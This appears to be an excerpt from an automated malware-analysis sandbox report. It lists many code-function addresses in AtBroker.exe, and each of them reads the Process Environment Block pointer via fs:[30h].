        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04556620 mov eax, dword ptr fs:[00000030h]11_2_04556620
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04558620 mov eax, dword ptr fs:[00000030h]11_2_04558620
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452262C mov eax, dword ptr fs:[00000030h]11_2_0452262C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A6C7 mov ebx, dword ptr fs:[00000030h]11_2_0455A6C7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A6C7 mov eax, dword ptr fs:[00000030h]11_2_0455A6C7
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E6F2 mov eax, dword ptr fs:[00000030h]11_2_0459E6F2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E6F2 mov eax, dword ptr fs:[00000030h]11_2_0459E6F2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E6F2 mov eax, dword ptr fs:[00000030h]11_2_0459E6F2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E6F2 mov eax, dword ptr fs:[00000030h]11_2_0459E6F2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A06F1 mov eax, dword ptr fs:[00000030h]11_2_045A06F1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A06F1 mov eax, dword ptr fs:[00000030h]11_2_045A06F1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04524690 mov eax, dword ptr fs:[00000030h]11_2_04524690
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04524690 mov eax, dword ptr fs:[00000030h]11_2_04524690
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045566B0 mov eax, dword ptr fs:[00000030h]11_2_045566B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455C6A6 mov eax, dword ptr fs:[00000030h]11_2_0455C6A6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04520750 mov eax, dword ptr fs:[00000030h]11_2_04520750
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562750 mov eax, dword ptr fs:[00000030h]11_2_04562750
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04562750 mov eax, dword ptr fs:[00000030h]11_2_04562750
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045AE75D mov eax, dword ptr fs:[00000030h]11_2_045AE75D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A4755 mov eax, dword ptr fs:[00000030h]11_2_045A4755
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455674D mov esi, dword ptr fs:[00000030h]11_2_0455674D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455674D mov eax, dword ptr fs:[00000030h]11_2_0455674D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455674D mov eax, dword ptr fs:[00000030h]11_2_0455674D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04528770 mov eax, dword ptr fs:[00000030h]11_2_04528770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530770 mov eax, dword ptr fs:[00000030h]11_2_04530770
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04520710 mov eax, dword ptr fs:[00000030h]11_2_04520710
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04550710 mov eax, dword ptr fs:[00000030h]11_2_04550710
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455C700 mov eax, dword ptr fs:[00000030h]11_2_0455C700
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455273C mov eax, dword ptr fs:[00000030h]11_2_0455273C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455273C mov ecx, dword ptr fs:[00000030h]11_2_0455273C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455273C mov eax, dword ptr fs:[00000030h]11_2_0455273C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459C730 mov eax, dword ptr fs:[00000030h]11_2_0459C730
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455C720 mov eax, dword ptr fs:[00000030h]11_2_0455C720
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455C720 mov eax, dword ptr fs:[00000030h]11_2_0455C720
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452C7C0 mov eax, dword ptr fs:[00000030h]11_2_0452C7C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A07C3 mov eax, dword ptr fs:[00000030h]11_2_045A07C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045247FB mov eax, dword ptr fs:[00000030h]11_2_045247FB
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045247FB mov eax, dword ptr fs:[00000030h]11_2_045247FB
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045427ED mov eax, dword ptr fs:[00000030h]11_2_045427ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045427ED mov eax, dword ptr fs:[00000030h]11_2_045427ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045427ED mov eax, dword ptr fs:[00000030h]11_2_045427ED
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045AE7E1 mov eax, dword ptr fs:[00000030h]11_2_045AE7E1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C678E mov eax, dword ptr fs:[00000030h]11_2_045C678E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045207AF mov eax, dword ptr fs:[00000030h]11_2_045207AF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04522050 mov eax, dword ptr fs:[00000030h]11_2_04522050
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A6050 mov eax, dword ptr fs:[00000030h]11_2_045A6050
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454C073 mov eax, dword ptr fs:[00000030h]11_2_0454C073
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E016 mov eax, dword ptr fs:[00000030h]11_2_0453E016
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E016 mov eax, dword ptr fs:[00000030h]11_2_0453E016
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E016 mov eax, dword ptr fs:[00000030h]11_2_0453E016
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E016 mov eax, dword ptr fs:[00000030h]11_2_0453E016
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A4000 mov ecx, dword ptr fs:[00000030h]11_2_045A4000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C2000 mov eax, dword ptr fs:[00000030h]11_2_045C2000
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B6030 mov eax, dword ptr fs:[00000030h]11_2_045B6030
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451A020 mov eax, dword ptr fs:[00000030h]11_2_0451A020
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451C020 mov eax, dword ptr fs:[00000030h]11_2_0451C020
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A20DE mov eax, dword ptr fs:[00000030h]11_2_045A20DE
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451C0F0 mov eax, dword ptr fs:[00000030h]11_2_0451C0F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045620F0 mov ecx, dword ptr fs:[00000030h]11_2_045620F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451A0E3 mov ecx, dword ptr fs:[00000030h]11_2_0451A0E3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A60E0 mov eax, dword ptr fs:[00000030h]11_2_045A60E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045280E9 mov eax, dword ptr fs:[00000030h]11_2_045280E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452208A mov eax, dword ptr fs:[00000030h]11_2_0452208A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E60B8 mov eax, dword ptr fs:[00000030h]11_2_045E60B8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E60B8 mov ecx, dword ptr fs:[00000030h]11_2_045E60B8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B80A8 mov eax, dword ptr fs:[00000030h]11_2_045B80A8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B8158 mov eax, dword ptr fs:[00000030h]11_2_045B8158
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04526154 mov eax, dword ptr fs:[00000030h]11_2_04526154
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04526154 mov eax, dword ptr fs:[00000030h]11_2_04526154
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451C156 mov eax, dword ptr fs:[00000030h]11_2_0451C156
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B4144 mov eax, dword ptr fs:[00000030h]11_2_045B4144
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B4144 mov eax, dword ptr fs:[00000030h]11_2_045B4144
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B4144 mov ecx, dword ptr fs:[00000030h]11_2_045B4144
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B4144 mov eax, dword ptr fs:[00000030h]11_2_045B4144
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B4144 mov eax, dword ptr fs:[00000030h]11_2_045B4144
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045CA118 mov ecx, dword ptr fs:[00000030h]11_2_045CA118
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045CA118 mov eax, dword ptr fs:[00000030h]11_2_045CA118
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045CA118 mov eax, dword ptr fs:[00000030h]11_2_045CA118
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045CA118 mov eax, dword ptr fs:[00000030h]11_2_045CA118
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E0115 mov eax, dword ptr fs:[00000030h]11_2_045E0115
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04550124 mov eax, dword ptr fs:[00000030h]11_2_04550124
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E1D0 mov eax, dword ptr fs:[00000030h]11_2_0459E1D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E1D0 mov eax, dword ptr fs:[00000030h]11_2_0459E1D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E1D0 mov ecx, dword ptr fs:[00000030h]11_2_0459E1D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E1D0 mov eax, dword ptr fs:[00000030h]11_2_0459E1D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0459E1D0 mov eax, dword ptr fs:[00000030h]11_2_0459E1D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E61C3 mov eax, dword ptr fs:[00000030h]11_2_045E61C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045E61C3 mov eax, dword ptr fs:[00000030h]11_2_045E61C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045501F8 mov eax, dword ptr fs:[00000030h]11_2_045501F8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045F61E5 mov eax, dword ptr fs:[00000030h]11_2_045F61E5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A019F mov eax, dword ptr fs:[00000030h]11_2_045A019F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A019F mov eax, dword ptr fs:[00000030h]11_2_045A019F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A019F mov eax, dword ptr fs:[00000030h]11_2_045A019F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A019F mov eax, dword ptr fs:[00000030h]11_2_045A019F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451A197 mov eax, dword ptr fs:[00000030h]11_2_0451A197
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451A197 mov eax, dword ptr fs:[00000030h]11_2_0451A197
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451A197 mov eax, dword ptr fs:[00000030h]11_2_0451A197
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04560185 mov eax, dword ptr fs:[00000030h]11_2_04560185
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045DC188 mov eax, dword ptr fs:[00000030h]11_2_045DC188
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045DC188 mov eax, dword ptr fs:[00000030h]11_2_045DC188
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4180 mov eax, dword ptr fs:[00000030h]11_2_045C4180
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4180 mov eax, dword ptr fs:[00000030h]11_2_045C4180
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451A250 mov eax, dword ptr fs:[00000030h]11_2_0451A250
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04526259 mov eax, dword ptr fs:[00000030h]11_2_04526259
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A8243 mov eax, dword ptr fs:[00000030h]11_2_045A8243
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A8243 mov ecx, dword ptr fs:[00000030h]11_2_045A8243
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0274 mov eax, dword ptr fs:[00000030h]11_2_045D0274
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04524260 mov eax, dword ptr fs:[00000030h]11_2_04524260
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04524260 mov eax, dword ptr fs:[00000030h]11_2_04524260
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04524260 mov eax, dword ptr fs:[00000030h]11_2_04524260
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451826B mov eax, dword ptr fs:[00000030h]11_2_0451826B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451823B mov eax, dword ptr fs:[00000030h]11_2_0451823B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A2C3 mov eax, dword ptr fs:[00000030h]11_2_0452A2C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A2C3 mov eax, dword ptr fs:[00000030h]11_2_0452A2C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A2C3 mov eax, dword ptr fs:[00000030h]11_2_0452A2C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A2C3 mov eax, dword ptr fs:[00000030h]11_2_0452A2C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A2C3 mov eax, dword ptr fs:[00000030h]11_2_0452A2C3
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045302E1 mov eax, dword ptr fs:[00000030h]11_2_045302E1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045302E1 mov eax, dword ptr fs:[00000030h]11_2_045302E1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045302E1 mov eax, dword ptr fs:[00000030h]11_2_045302E1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E284 mov eax, dword ptr fs:[00000030h]11_2_0455E284
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455E284 mov eax, dword ptr fs:[00000030h]11_2_0455E284
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A0283 mov eax, dword ptr fs:[00000030h]11_2_045A0283
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A0283 mov eax, dword ptr fs:[00000030h]11_2_045A0283
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A0283 mov eax, dword ptr fs:[00000030h]11_2_045A0283
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045302A0 mov eax, dword ptr fs:[00000030h]11_2_045302A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045302A0 mov eax, dword ptr fs:[00000030h]11_2_045302A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B62A0 mov eax, dword ptr fs:[00000030h]11_2_045B62A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B62A0 mov ecx, dword ptr fs:[00000030h]11_2_045B62A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B62A0 mov eax, dword ptr fs:[00000030h]11_2_045B62A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B62A0 mov eax, dword ptr fs:[00000030h]11_2_045B62A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B62A0 mov eax, dword ptr fs:[00000030h]11_2_045B62A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045B62A0 mov eax, dword ptr fs:[00000030h]11_2_045B62A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A035C mov eax, dword ptr fs:[00000030h]11_2_045A035C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A035C mov eax, dword ptr fs:[00000030h]11_2_045A035C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A035C mov eax, dword ptr fs:[00000030h]11_2_045A035C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A035C mov ecx, dword ptr fs:[00000030h]11_2_045A035C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A035C mov eax, dword ptr fs:[00000030h]11_2_045A035C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A035C mov eax, dword ptr fs:[00000030h]11_2_045A035C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045EA352 mov eax, dword ptr fs:[00000030h]11_2_045EA352
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C8350 mov ecx, dword ptr fs:[00000030h]11_2_045C8350
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A2349 mov eax, dword ptr fs:[00000030h]11_2_045A2349
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C437C mov eax, dword ptr fs:[00000030h]11_2_045C437C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451C310 mov ecx, dword ptr fs:[00000030h]11_2_0451C310
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04540310 mov ecx, dword ptr fs:[00000030h]11_2_04540310
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A30B mov eax, dword ptr fs:[00000030h]11_2_0455A30B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A30B mov eax, dword ptr fs:[00000030h]11_2_0455A30B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455A30B mov eax, dword ptr fs:[00000030h]11_2_0455A30B
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C43D4 mov eax, dword ptr fs:[00000030h]11_2_045C43D4
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C43D4 mov eax, dword ptr fs:[00000030h]11_2_045C43D4
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045DC3CD mov eax, dword ptr fs:[00000030h]11_2_045DC3CD
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A3C0 mov eax, dword ptr fs:[00000030h]11_2_0452A3C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A3C0 mov eax, dword ptr fs:[00000030h]11_2_0452A3C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A3C0 mov eax, dword ptr fs:[00000030h]11_2_0452A3C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A3C0 mov eax, dword ptr fs:[00000030h]11_2_0452A3C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A3C0 mov eax, dword ptr fs:[00000030h]11_2_0452A3C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452A3C0 mov eax, dword ptr fs:[00000030h]11_2_0452A3C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045283C0 mov eax, dword ptr fs:[00000030h]11_2_045283C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045283C0 mov eax, dword ptr fs:[00000030h]11_2_045283C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045283C0 mov eax, dword ptr fs:[00000030h]11_2_045283C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045283C0 mov eax, dword ptr fs:[00000030h]11_2_045283C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A63C0 mov eax, dword ptr fs:[00000030h]11_2_045A63C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E3F0 mov eax, dword ptr fs:[00000030h]11_2_0453E3F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E3F0 mov eax, dword ptr fs:[00000030h]11_2_0453E3F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0453E3F0 mov eax, dword ptr fs:[00000030h]11_2_0453E3F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045563FF mov eax, dword ptr fs:[00000030h]11_2_045563FF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045303E9 mov eax, dword ptr fs:[00000030h]11_2_045303E9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04518397 mov eax, dword ptr fs:[00000030h]11_2_04518397
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04518397 mov eax, dword ptr fs:[00000030h]11_2_04518397
